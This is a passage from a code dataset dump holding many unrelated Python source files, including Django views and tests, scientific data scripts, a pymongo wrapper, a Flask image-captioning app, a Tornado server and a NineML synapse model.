request.POST.get('post', None)\n\telse:\n\t\twhere = ''\n\n\t#REMOVE DUPLICATES\n\tsimilar_posts = Post.objects.filter(where__icontains=where)\n\t#return json list of posts\n\treturn render(request, 'book/search_bar_results.html', {'posts':similar_posts,})\n\t#get the keyword on search bar\n\t#filter posts based on keyword\n\t#return list\n\ndef show_searched_post(request, post_id):\n\t#MAYBE INCLUDE TAKEN DATES BUT SPECIFY AT TEMPLATE LEVEL USING CHECK ICONS\n\tposts_list = Date.objects.filter(post__id=post_id).filter(is_taken=False)\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\n\n","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"218487804","text":"import os\nfrom datetime import date\nfrom unittest.mock import MagicMock\n\nfrom django.core.files import File\nfrom django.test import TestCase\n\nfrom ..models import Maid\n\nclass TestMaid(TestCase):\n def test_model_should_have_defined_fields(self):\n # Given\n Maid.objects.create(\n name='BBBBBBBBBBBBBBBBBBBBBBBB',\n birthdate=date(1998, 4, 29),\n description='Super Maid',\n certificate='Best Maid 2012',\n salary=4000\n )\n\n # When\n maid = Maid.objects.last()\n\n # Then\n assert maid.name == 'BBBBBBBBBBBBBBBBBBBBBBBB'\n assert maid.birthdate == date(1998, 4, 29)\n assert maid.description == 'Super Maid'\n assert maid.certificate == 'Best Maid 2012'\n assert maid.salary == 4000\n\n def test_model_should_have_image_fields(self):\n # Given\n mock = MagicMock(spec=File)\n mock.name = 'profile.png'\n\n Maid.objects.create(\n profile_image=mock,\n name='BBBBBBBBBBBBBBBBBBBBBBBB',\n birthdate=date(1998, 4, 29),\n description='Super Maid',\n certificate='Best Maid 2012',\n salary=4000\n )\n\n # When\n maid = Maid.objects.last()\n\n # Then\n assert maid.profile_image.name == 'profile.png'\n\n os.remove('media/profile.png')\n\n def test_model_should_have_created_and_updated_fields(self):\n # Given\n Maid.objects.create(\n name='BBBBBBBBBBBBBBBBBBBBBBBB',\n birthdate=date(1998, 4, 29),\n description='Super Maid',\n certificate='Best Maid 2012',\n salary=4000\n )\n\n # 
When\n maid = Maid.objects.last()\n\n # Then\n assert maid.created is not None\n assert maid.modified is not None\n\n\n\n","sub_path":"homemaid/maids/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"186770540","text":"# -*- coding: utf-8 -*-\nfrom sys import argv\nimport re\n\n# FEB/A to PAB adapter HV mapping\nhvMap = [\t4, 4, \\\n\t\t3, 3, \\\n\t\t5, 5, \\\n\t\t2, 2, \\\n\t\t6, 6, \\\n\t\t1, 1, \\\n\t\t7, 7, \\\n\t\t0, 0 \\\n\t]\n\t\n\ndef main(argv):\n\tinputFile = open(argv[1], \"r\")\n\toutputFile = open(argv[2], \"w\")\n\n\tregex = re.compile(r'([0-9]+)\\s([0-9]+)\\s([0-9]+)\\s([0-9]+)\\s([0-9\\.]+)\\s([0-9\\.]+)\\s([0-9\\.]+)\\s([0-9]+).*')\n\tlines = [ line for line in inputFile]\n\tfor board in range(2):\n\t\tfor line in lines:\t\t\t\n\t\t\tm = regex.match(line)\n\t\t\tassert m is not None\n\t\t\t\n\t\t\tchannel, region, xi, yi, x, y, z, hv = m.groups()\n\t\t\tchannel = int(channel)\n\t\t\tregion = int(region)\n\t\t\txi = int(xi)\n\t\t\tyi = int(yi)\n\t\t\tx = float(x)\n\t\t\ty = float(y)\n\t\t\tz = float(z)\n\t\t\thv = int(hv)\n\n\t\t\tchannel = 128 * board + channel\n\t\t\tregion = board\n\n\t\t\t# Mirror board\n\t\t\tif board == 1:\n\t\t\t\txi = 15 - xi\n\t\t\t\tx = (3.6 * 15) - x\n\n\t\t\tif board == 0:\n\t\t\t\tz = -50.0\n\t\t\telse:\n\t\t\t\tz = 50.0\n\t\t\thv = hvMap[hv] + 8 * board\n\n\t\t\toutputFile.write(\"%d\\t%d\\t%d\\t%d\\t%f\\t%f\\t%f\\t%d\\n\" % (channel, region, xi, yi, x, y, z, hv))\n\n\toutputFile.close()\n\tinputFile.close()\n\t\t\n\n\nif __name__ == '__main__':\n\tmain(argv)","sub_path":"sw_daq/aDAQ/TOFPET/FEBA_PAB_MEZ2.map.py","file_name":"FEBA_PAB_MEZ2.map.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"336142973","text":"from __future__ import absolute_import\n\nfrom graphql.execution.base import ResolveInfo\n\nfrom dagster import check\nfrom dagster.core.execution.api import create_execution_plan\n\nfrom ..fetch_pipelines import get_pipeline_def_from_selector\nfrom ..fetch_runs import get_validated_config\nfrom ..utils import ExecutionMetadata, ExecutionParams, capture_dauphin_error\nfrom .utils import _check_start_pipeline_execution_errors, _create_pipeline_run\n\n\n@capture_dauphin_error\ndef launch_pipeline_reexecution(graphene_info, execution_params):\n return _launch_pipeline_execution(graphene_info, execution_params, is_reexecuted=True)\n\n\n@capture_dauphin_error\ndef launch_pipeline_execution(graphene_info, execution_params):\n return _launch_pipeline_execution(graphene_info, execution_params)\n\n\ndef _launch_pipeline_execution(graphene_info, execution_params, is_reexecuted=False):\n check.inst_param(graphene_info, 'graphene_info', ResolveInfo)\n check.inst_param(execution_params, 'execution_params', ExecutionParams)\n\n if is_reexecuted:\n # required fields for re-execution\n execution_metadata = check.inst_param(\n execution_params.execution_metadata, 'execution_metadata', ExecutionMetadata\n )\n check.str_param(execution_metadata.root_run_id, 'root_run_id')\n check.str_param(execution_metadata.parent_run_id, 'parent_run_id')\n\n error_type = 'RunLauncherNotDefinedError'\n success_type = (\n 'LaunchPipelineExecutionSuccess'\n if not is_reexecuted\n else 'LaunchPipelineReexecutionSuccess'\n )\n instance = graphene_info.context.instance\n run_launcher = instance.run_launcher\n\n if run_launcher is 
None:\n return graphene_info.schema.type_named(error_type)()\n\n pipeline_def = get_pipeline_def_from_selector(graphene_info, execution_params.selector)\n\n get_validated_config(\n pipeline_def,\n environment_dict=execution_params.environment_dict,\n mode=execution_params.mode,\n )\n\n execution_plan = create_execution_plan(\n pipeline_def, execution_params.environment_dict, mode=execution_params.mode,\n )\n\n _check_start_pipeline_execution_errors(graphene_info, execution_params, execution_plan)\n\n run = instance.launch_run(_create_pipeline_run(instance, pipeline_def, execution_params))\n\n return graphene_info.schema.type_named(success_type)(\n run=graphene_info.schema.type_named('PipelineRun')(run)\n )\n","sub_path":"python_modules/dagster-graphql/dagster_graphql/implementation/execution/launch_execution.py","file_name":"launch_execution.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"78463536","text":"from typing import Union\n\nfrom pymongo import MongoClient\nfrom pymongo.collection import Collection\nfrom .monkey import patch\nfrom .scheme import Scheme, _signals_hook, _validate_hook, _sort_hook\n\n\nclass Database(object):\n def __init__(self,\n client: Union[None, MongoClient]=None,\n database_name: Union[None, str]=None,\n indexes_warn_level: int = 0):\n\n self.database_name = database_name\n self.client = client\n self.indexes_warn_level = indexes_warn_level\n\n self._registered_schemes = {}\n\n self.database = self.client.get_database(self.database_name)\n\n if self.indexes_warn_level:\n self.check_indexes()\n\n patch(_validate_hook, _signals_hook, _sort_hook)\n\n def check_indexes(self):\n for scheme_name, scheme in self.get_registered_schemes().items():\n scheme.check_indexes()\n\n def _register_schemes(self):\n \"\"\" This method collect all database instance properties, which have\n class base `Scheme` and cache it in `_registered_schemes`\n \"\"\"\n for name in dir(self):\n field = getattr(self, name)\n if isinstance(field, Scheme):\n self._registered_schemes[field._name] = field\n\n def get_registered_schemes(self):\n \"\"\" This method return list of registered schemes if this database, or\n register schemes and then return it.\n Returns: List of Schemes\n \"\"\"\n if not self._registered_schemes:\n self._register_schemes()\n return self._registered_schemes\n\n def get_scheme(self, name):\n \"\"\" This method return `Scheme` instance registered in this database or\n `None` if scheme does not registered\n Returns: Scheme instance or None\n \"\"\"\n return self.get_registered_schemes().get(name, None)\n\n def _update_all_indexes_cache(self):\n \"\"\" This method update indexes cache for each registered scheme\"\"\"\n for scheme in self.get_registered_schemes():\n scheme.update_indexes_cache()\n\n def __getitem__(self, item):\n return getattr(self, item)\n\n def __repr__(self):\n return repr(self.client.get_database(self.database_name))\n\n def __getattr__(self, item):\n \"\"\"\n Args:\n item:\n Returns:\n bounded method of pymongo db instance (wrapper) or\n registered scheme\n Raises:\n AttributeError if attribute is not bounded method of pymongo db\n instance and if scheme with that name does not registered on this\n corset database\n \"\"\"\n collection_or_method = getattr(self.database, item)\n\n if isinstance(collection_or_method, Collection):\n scheme = self.__getattribute__(item)\n if not scheme:\n msg = \"Scheme with name {} does not registered\"\n raise 
AttributeError(msg.format(item))\n else:\n return scheme\n elif callable(collection_or_method):\n def wrapper(*args, **kwargs):\n \"\"\"wrapper for collection#drop(db.test)\"\"\"\n args = list(args)\n for index, arg in enumerate(args):\n if isinstance(arg, Scheme):\n args[index] = arg._collection\n return collection_or_method(*args, **kwargs)\n return wrapper\n else:\n return collection_or_method\n","sub_path":"pymongo_corset/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"119103324","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nn_0 = 20 #initial number of individuals\nu = 0.01 #background mortality rate\nP = 0 #max predation rate\ns_pref = 2 #predators preferred prey body size\ngamma = 1 #strength of predators preference\nr_min = 1 # minimum reproduction rate of mature individual\ng_min = 1 #minimum growth rate\nalpha = 0.1 #SD in \"mutational\" kernel (random normal with mean 0)\n\nsim_id = 'ninit%d_u%r_P%r_spref%r_gamma%r_rmin%r_gmin%r_alpha%r' %(n_0,u,P,s_pref,gamma,r_min,g_min,alpha)\n\n#get data from simulation\ntimes,n = np.loadtxt('abundance_%s.dat' %(sim_id),skiprows=1, unpack=True)\ntimes,s = np.loadtxt('meansize_%s.dat' %(sim_id),skiprows=1, unpack=True)\ntimes,smat = np.loadtxt('meansizematurity_%s.dat' %(sim_id),skiprows=1, unpack=True)\n\nfig1 = plt.figure()\n\nplt1 = plt.subplot(311)\nplt1.plot(times, n)\nplt1.set_ylabel('abundance')\n\nplt2 = plt.subplot(312)\nplt2.plot(times, s)\nplt2.set_ylabel('mean size')\n\nplt3 = plt.subplot(313)\nplt3.plot(times, smat)\nplt3.set_ylabel('mean size at maturity')\nplt3.set_xlabel('time')\n\nfig1.savefig('plot_%s.png' %(sim_id))","sub_path":"SIMULATIONS/EvoPlot.py","file_name":"EvoPlot.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"261418986","text":"array_a = [1, 2, 3, 4]\narray_b = [5, 6, 7, 8]\n\n\ndef merge(array1, array2):\n array_c = []\n array1_idx = 0\n array2_idx = 0\n while array1_idx < len(array1) and array2_idx < len(array2):\n if array1[array1_idx] < array2[array2_idx]:\n array_c.append(array1[array1_idx])\n array1_idx += 1\n else:\n array_c.append(array2[array2_idx])\n array2_idx += 1\n\n if array1_idx == len(array1):\n while array2_idx < len(array2):\n array_c.append(array2[array2_idx])\n array2_idx += 1\n if array2_idx == len(array2):\n while array1_idx < len(array1):\n array_c.append(array1[array1_idx])\n array1_idx += 1\n return array_c\n\n\nprint(merge(array_a, array_b)) # should be [1, 2, 3, 4, 5, 6, 7, 8]!","sub_path":"week_3/04_merge.py","file_name":"04_merge.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"260373441","text":"from flask import current_app\nimport requests \n\ndef weather_by_city(lat, lon):\n\n weather_url = current_app.config[\"WEATHER_URL\"]\n params = {\n 'lat': lat,\n 'lon': lon,\n 'units': 'metric',\n 'lang': 'ru',\n 'exclude': 'minutely',\n 'appid': current_app.config[\"WEATHER_API_KEY\"]\n }\n try:\n result = requests.get(weather_url, params = params)\n result.raise_for_status()\n weather = result.json()\n\n if 'current' in weather:\n try:\n return weather['current']\n except (IndexError, TypeError):\n return False\n except(requests.RequestException, ValueError):\n print('Network error')\n return False\n\n\n return False\n\nif __name__ == 
'__main__':\n    print(weather_by_city('55.89','37.47'))","sub_path":"webapp/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"652745195","text":"#!/usr/bin/env python\n#\n### modified date: 2013/11/21\n#\n\nfrom operator import itemgetter, attrgetter\nfrom gaussian import *\nfrom vasp import *\n\n__author__ = \"\"\n__date__ = \"2013/11/21\"\n\n__version__ = \"$Revision: 0.1$\"\n\n\ndef gjf2poscar(gjf, poscar):\n    \"\"\" Convert a Gaussian GJF to a VASP POSCAR\n    gjf: {GJF}\n    poscar: {POSCAR}\n    \"\"\"\n    poscar.setLattice(gjf._lattice_.getVectors() )\n    for a in gjf._atoms_:\n        poscar.addAtom(a)\n\n#def poscar2gjf(poscar, gjf, elements = ['A', 'B', 'C', 'D']):\ndef poscar2gjf(poscar, gjf, elements = None):\n    \"\"\" Convert a VASP POSCAR to a Gaussian GJF\n    poscar: {POSCAR}\n    gjf: {GJF}\n    elements: {string array}\n    \"\"\"\n    poscar.directToCartesian()\n    if elements != None:\n        poscar.setElementsType(elements)\n    for a in poscar._atoms_:\n        gjf.addAtom(a)\n    gjf.setLattice(poscar.getLattice().getVectors() )\n#    for v in poscar.getLattice().getVectors():\n#        tmp1, tmp2, tmp3 = v.getBasis()\n#        a = Atom('Tv', tmp1, tmp2, tmp3)\n#        gjf.addAtom(a)\n\n\nif __name__ == \"__main__\":\n    import sys\n    import os\n\n    pass\n","sub_path":"gvbridge/bin/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"213939578","text":"from flask import Flask,render_template, url_for, redirect\r\nfrom flask import request, send_from_directory, flash\r\nimport numpy\r\nfrom numpy import array\r\nfrom numpy import argmax\r\nfrom PIL import Image\r\nimport pickle\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nimport os\r\nimport tensorflow\r\nfrom tensorflow.keras.applications.vgg16 import VGG16, preprocess_input\r\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\r\nfrom tensorflow.keras.models import load_model, Model\r\nfrom tensorflow.keras.preprocessing import image\r\n\r\n\r\napp=Flask(__name__,template_folder='template')\r\n\r\n# RELATED TO THE SQL DATABASE\r\napp.config['SECRET_KEY'] = '5891628bb0b13ce0c676dfde280ba245'\r\n#app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///site.db\"\r\n\r\n\r\n#from this import SQLAlchemy\r\n\r\n\r\ndir_path = os.path.dirname(os.path.realpath(__file__))\r\n\r\nUPLOAD_FOLDER = 'uploads'\r\nSTATIC_FOLDER = 'static'\r\n\r\nwith open('tokenizer.pkl', 'rb') as f:\r\n    data = pickle.load(f)\r\n\r\ndef extract_features(filename):\r\n    model = VGG16()\r\n    model.layers.pop()\r\n    model = Model(inputs=model.inputs, outputs=model.layers[-2].output)\r\n    image = load_img(filename, target_size=(224, 224))\r\n    image = img_to_array(image)\r\n    image = image.reshape((1, image.shape[0], image.shape[1], image.shape[2]))\r\n    image = preprocess_input(image)\r\n    feature = model.predict(image, verbose=0)\r\n    return feature\r\n\r\ndef word_for_id(integer, tokenizer):\r\n    for word, index in tokenizer.word_index.items():\r\n        if index == integer:\r\n            return word\r\n    return None\r\n\r\n# Function for generating descriptions\r\ndef generate_desc(model, tokenizer, photo, max_length):\r\n    in_text = 'startseq'\r\n    for i in range(max_length):\r\n        sequence = tokenizer.texts_to_sequences([in_text])[0]\r\n        sequence = pad_sequences([sequence], maxlen=max_length)\r\n        yhat = model.predict([photo,sequence], verbose=0)\r\n        yhat = argmax(yhat)\r\n        word = 
word_for_id(yhat, tokenizer)\r\n        if word is None:\r\n            break\r\n        in_text += ' ' + word\r\n        if word == 'endseq':\r\n            break\r\n    return in_text\r\n\r\n\r\n# process the uploaded file and predict a caption for it\r\n@app.route('/upload', methods=['POST','GET'])\r\ndef upload_file():\r\n    if request.method == 'GET':\r\n        return render_template('index.html')\r\n    else:\r\n        try:\r\n            file = request.files['image']\r\n            full_name = os.path.join(UPLOAD_FOLDER, file.filename)\r\n            file.save(full_name)\r\n            photo = extract_features(full_name)\r\n            #print(\"After extraction :\")\r\n            #print(photo.shape)\r\n            model= load_model(\"model_9.h5\")\r\n            #print(model.summary())\r\n            description= generate_desc(model, data, photo, 34)\r\n            descript= description.split(\" \")\r\n            descript= \" \".join(descript[1:-1])\r\n            return render_template('predict.html', story= descript, image_file_name= file.filename)\r\n        except :\r\n            flash(\"Please select the image first !!\", \"success\") \r\n            return redirect(url_for(\"caption\"))\r\n\r\n@app.route('/uploads/<filename>')\r\ndef send_file(filename):\r\n    return send_from_directory(UPLOAD_FOLDER, filename)\r\n\r\n@app.route(\"/\")\r\n\r\n@app.route(\"/home\")\r\ndef home():\r\n\treturn render_template(\"home.html\")\r\n\r\n@app.route(\"/about\")\r\ndef about():\r\n\treturn render_template(\"about.html\")\r\n\r\n@app.route(\"/caption\")\r\ndef caption():\r\n    return render_template(\"index.html\")\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"165276353","text":"from django.shortcuts import render\nfrom products.models import Artist, Category, Room, Hashtag\nfrom django.db import models\nfrom django.apps import apps\nfrom pictures_on_the_wall.utils import special_filter\n\ndef index(request):\n    \"\"\"A view that displays the landing page\"\"\"\n    return render(request, \"index.html\")\n\ndef index_no_intro(request, filter_group=\"category\"):\n    \"\"\"The view that displays the landing page without the intro, so users\n    already on the page don't get disrupted by the intro every time\n    they go back to the home page\"\"\"\n    # Different filtering can be selected, therefore links and page content \n    # need presetting\n    possible_filters = (\n        \"category\",\n        \"artist\",\n        \"room\",\n        \"hashtag\"\n    )\n    others = []\n    # creating a list for the unselected potential other filters\n    for filt in possible_filters:\n        if filt == filter_group:\n            continue\n        else:\n            others.append(filt)\n    \n    # Pick the Model for the selected filter\n    SelectedModel = apps.get_model('products', filter_group)\n    print(f\"SelectedModel {SelectedModel}\")\n    # collecting the instances from the selected model\n    filter_group_queryset = SelectedModel.objects.all()\n    print(f\"filter_group_queryset: every Product from the selected model {filter_group_queryset}\")\n    # create a list of sample Products that represents each instance in the model\n    sample_list = []\n    for item in filter_group_queryset:\n        sample_prod = special_filter(filter_group, str(item)).order_by('id').first()\n        sample_list.append(sample_prod)\n\n    # organise the QuerySets and the sample Products into a list of lists,\n    # so it is easy to handle on the frontend in a for loop\n    items = []\n    for i, item in enumerate(filter_group_queryset):\n        # each inner list consists of the QuerySet item and the corresponding sample\n        items.append([item, sample_list[i]])\n\n    if SelectedModel == Hashtag:\n        print(\"Hashtag 
selected, THIS IS NOT GOOODDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\")\n # HASHTAGS to be excluded from filtering \n\n page_structure = {\n 'filter_by': filter_group,\n 'others': others,\n 'items': items\n }\n\n print(page_structure)\n\n return render(request, 'index_no_intro.html', {'data': page_structure})\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356936238","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as plticker\nfrom config import Config\nfrom data_utils import CoNLL2003Dataset, CoNLL2005Dataset, SemcorDataset, \\\n get_vocabs, get_glove_vocab, load_vocab,\\\n get_processing_word, UNK, NUM, START, PAD, EOS,\\\n write_vocab, get_char_vocab, generate_semcor_data,\\\n split_dataset_traindevtest, write_linebased,\\\n export_trimmed_glove_vectors\n\nconfig = Config()\n\ndef getIdx2Tag():\n idx_to_tag = dict()\n i = 0\n with open('data/semcor/tags.txt', 'r') as f:\n for line in f:\n idx_to_tag[i] = line.strip()\n i+=1\n return idx_to_tag\n\ndef getTagDist(dataset, idx2tag):\n freq = dict()\n for x,y,z in dataset:\n labels = list(map(idx2tag.get, y))\n for l in labels:\n if l.startswith('B'):\n c = freq.setdefault(l,0)\n freq[l] = c+1\n counts = np.array(list(freq.values()))\n dist = counts / np.sum(counts)\n return dist, len(dist), counts\n\ntrain = SemcorDataset(config.semcor.filename_train, \n config.processing_word,\n config.semcor.processing_tag, \n config.max_iter)\n\ndev = SemcorDataset(config.semcor.filename_dev, \n config.processing_word,\n config.semcor.processing_tag, \n config.max_iter)\n\ntest = SemcorDataset(config.semcor.filename_test, \n config.processing_word,\n config.semcor.processing_tag, \n config.max_iter)\n\nidx2tag = getIdx2Tag()\n\ntrain_dist, l1, c1 = getTagDist(train, idx2tag)\nprint(l1, c1)\ndev_dist, l2, c2 = getTagDist(dev, idx2tag)\nprint(l2, c2)\ntest_dist, l3, c3 = getTagDist(test, idx2tag)\nprint(l3, c3)\n\n\nplt.style.use('presentation')\n\nfig, ax =plt.subplots()\nindex = np.arange(l1)*2 \nbar_width = 0.5\nopacity=0.8\n\nr1 = ax.bar(index, train_dist, bar_width, label='train')\nr2 = ax.bar(index + bar_width, dev_dist, bar_width, label='dev')\nr3 = ax.bar(index + 2 * bar_width, test_dist, bar_width, label='test')\n\nplt.xlabel('Super Sense (# total = 41)')\nplt.ylabel('Normalised Frequency')\nplt.title('Distribution of label tags in each subset')\nplt.xticks((index+bar_width)[::5], (index/2)[::5])\n# ax.xaxis.set_major_locator(plticker.MultipleLocator(10))\n\nplt.legend()\n#plt.tight_layout()\nplt.show()\n","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290977369","text":"# uncompyle6 version 3.7.0\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.8.1 (tags/v3.8.1:1b293b6, Dec 18 2019, 22:39:24) [MSC v.1916 32 bit (Intel)]\n# Embedded file name: C:\\Cygwin\\home\\toonpub\\player_1_0_46_qa\\toontown\\src\\parties\\DistributedPartyValentineJukeboxActivity.py\nfrom toontown.parties.DistributedPartyJukeboxActivityBase import DistributedPartyJukeboxActivityBase\nfrom toontown.parties import PartyGlobals\n\nclass DistributedPartyValentineJukeboxActivity(DistributedPartyJukeboxActivityBase):\n __module__ = __name__\n notify = directNotify.newCategory('DistributedPartyJukeboxActivity')\n\n def 
__init__(self, cr):\n DistributedPartyJukeboxActivityBase.__init__(self, cr, PartyGlobals.ActivityIds.PartyValentineJukebox, PartyGlobals.PhaseToMusicData)\n\n def load(self):\n DistributedPartyJukeboxActivityBase.load(self)\n newTexture = loader.loadTexture('phase_13/maps/tt_t_ara_pty_jukeboxValentineA.jpg', 'phase_13/maps/tt_t_ara_pty_jukeboxValentineA_a.rgb')\n case = self.jukebox.find('**/jukeboxGlass')\n if not case.isEmpty():\n case.setTexture(newTexture, 1)\n body = self.jukebox.find('**/jukeboxBody')\n if not body.isEmpty():\n body.setTexture(newTexture, 1)","sub_path":"2011-web-sv1.0.46.1/modules_decompiled/toontown/parties/DistributedPartyValentineJukeboxActivity.py","file_name":"DistributedPartyValentineJukeboxActivity.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"274452751","text":"filename = \"/home/antonio/Progetto Grafica/lines/tappog.lines\"\nlines = lines2lines(filename)\nrobiewall = STRUCT(AA(POLYLINE)(lines)) \nV,FV,EV,polygons = larFromLines(lines)\nVV = AA(LIST)(range(len(V)))\nsubmodel = STRUCT(MKPOLS((V,EV)))\n#VIEW(larModelNumbering(1,1,1)(V,[VV,EV,FV],submodel,0.01))\n\nW = (((mat(V) - V[0]) * 438.31) + [.5,.5]).tolist()\n\ntemp = 266.948649\n\nW[7]=[temp,W[7][1]]\nW[4]=[temp,W[4][1]]\nW[5]=[temp,W[5][1]]\n\ntappogM = (W,[FV[1]]+[FV[0]])\ntappogP = [-5,-alzo0,sfspac]\n\ntappog = larModelProduct([tappogM,larQuote1D(tappogP)])\n\nW[7] = SUM([W[7],[-larghezzaB,-larghezzaB]])\nW[4] = SUM([W[4],[-larghezzaB,larghezzaB]])\nW[5] = SUM([W[5],[-larghezzaB,larghezzaB]])\nW[9] = SUM([W[9],[larghezzaB,larghezzaB]])\nW[2] = SUM([W[2],[larghezzaB,larghezzaB]])\nW[3] = SUM([W[3],[larghezzaB,-larghezzaB]])\n\ntfstileP = [-5,-alzo0,bordino,-bordino,2*bordino]\ntappoGstile = larModelProduct([tappogM,larQuote1D(tfstileP)])\n\n","sub_path":"266319/models/tappog.py","file_name":"tappog.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"646310412","text":"\n\"\"\"\n\nDynamic synaptic weight implementing phenomenological short term\ndepression and facilitation.\n\n Description:\n\n Implemented is the ODE form of the short-term depression and\n facilitation model as described Eq (2) and Eq (3) in [1] or Eq (6)\n in [2], whereby Eq (2) in [1] seems to have an error in the\n subscript of u_{n+1}. It should be u_{n}.\n\n The model corresponds to the markram_synapse in NEST, which is a\n simplification of the NEST tsodyks_synapse (synaptic time course is\n neglected).\n\n References:\n\n [1] Markram, Wang, Tsodyks (1998) Differential Signaling via the same axon\n of neocortical pyramidal neurons. PNAS, vol 95, pp. 5323-5328.\n\n [2] D. Sussillo, T. Toyoizumi, and W. Maass. Self-tuning of neural circuits through\n short-term synaptic plasticity. 
Journal of Neurophysiology, 97:4079-4095, 2007.\n\nAuthor: Eilif Muller, 2010.\n\n\"\"\"\n\nimport nineml.abstraction_layer as nineml\n\n\nregimes = [\n nineml.Regime(\n \"dR/dt = (1-R)/tau_r\", # tau_r is the recovery time constant for depression\n \"du/dt = -(u-U)/tau_f\", # tau_f is the time constant of facilitation\n transitions=nineml.On(nineml.SpikeInputEvent,\n do=[\"Wout = u*R*Win\",\n \"R -= u*R\",\n \"u += U*(1-u)\",\n nineml.PreEventRelay]) # Should I put a SpikeOutputEvent here?\n )]\n\nports = [nineml.SendPort(\"Wout\")]\n\nc1 = nineml.Component(\"MarkramSynapseDynamics\", regimes=regimes, ports=ports)\n\n# write to file object f if defined\ntry:\n # This case is used in the test suite for examples.\n c1.write(f)\nexcept NameError:\n import os\n\n base = \"markram_synapse_dynamics\"\n c1.write(base + \".xml\")\n c2 = nineml.parse(base + \".xml\")\n assert c1 == c2\n\n c1.to_dot(base + \".dot\")\n os.system(\"dot -Tpng %s -o %s\" % (base + \".dot\", base + \".png\"))\n","sub_path":"lib9ml/python/nineml/examples/examples_from_trunk_pre_merge/AL/markram_synapse_dynamics.py","file_name":"markram_synapse_dynamics.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"569555793","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport logging\nimport functools\n\nimport tornado.auth\nimport tornado.web\nimport tornado.ioloop\nimport tornado.database\nimport tornado.httpserver\n\nfrom backgroundworker import worker_switch\n\nfrom db import ConnectDB\nfrom main import IndexHandler, BroadcastHandler, DownloadHandler, AnswerHandler, LoginHandler, UserHandler, LogoutHandler\n\nfrom config import site_config\n\n\nclass Application(tornado.web.Application):\n\n listeners = []\n online_users = []\n\n def __init__(self):\n handlers = [\n (r'/answer', AnswerHandler),\n (r'/download', DownloadHandler),\n (r'/login', LoginHandler),\n (r'/logout', LogoutHandler),\n (r'/new', UserHandler),\n (r'/', IndexHandler),\n (r'/broadcast', BroadcastHandler),\n ]\n settings = dict(\n site_title=site_config[\"site_title\"],\n template_path=os.path.join(os.path.dirname(__file__), 'templates'),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n debug=True,\n cookie_secret='3295bfab668c4ad48dad43f890402905',\n login_url='/login',\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n self.session = ConnectDB()\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.ERROR)\n app = Application()\n loop = tornado.ioloop.IOLoop.instance()\n tornado.ioloop.PeriodicCallback(functools.partial(worker_switch, app), 40000, loop).start()\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(int(8888))\n loop.start()\n","sub_path":"TornadoQuizz/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"408804996","text":"#!/usr/bin/env python3\n\n# OpenCV program to detect face in real time from webcam footage.\nimport cv2\nfrom PIL import Image\n\ndef make_tflite_face_getter():\n from edgetpu.detection.engine import DetectionEngine\n camera = cv2.VideoCapture(0)\n cameraIndex = 0\n if not camera.isOpened():\n camera = cv2.VideoCapture(1)\n cameraIndex = 1\n \n width, height = int(camera.get(3)), int(camera.get(4))\n \n engine = DetectionEngine('./models/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite')\n \n def zoomer():\n 
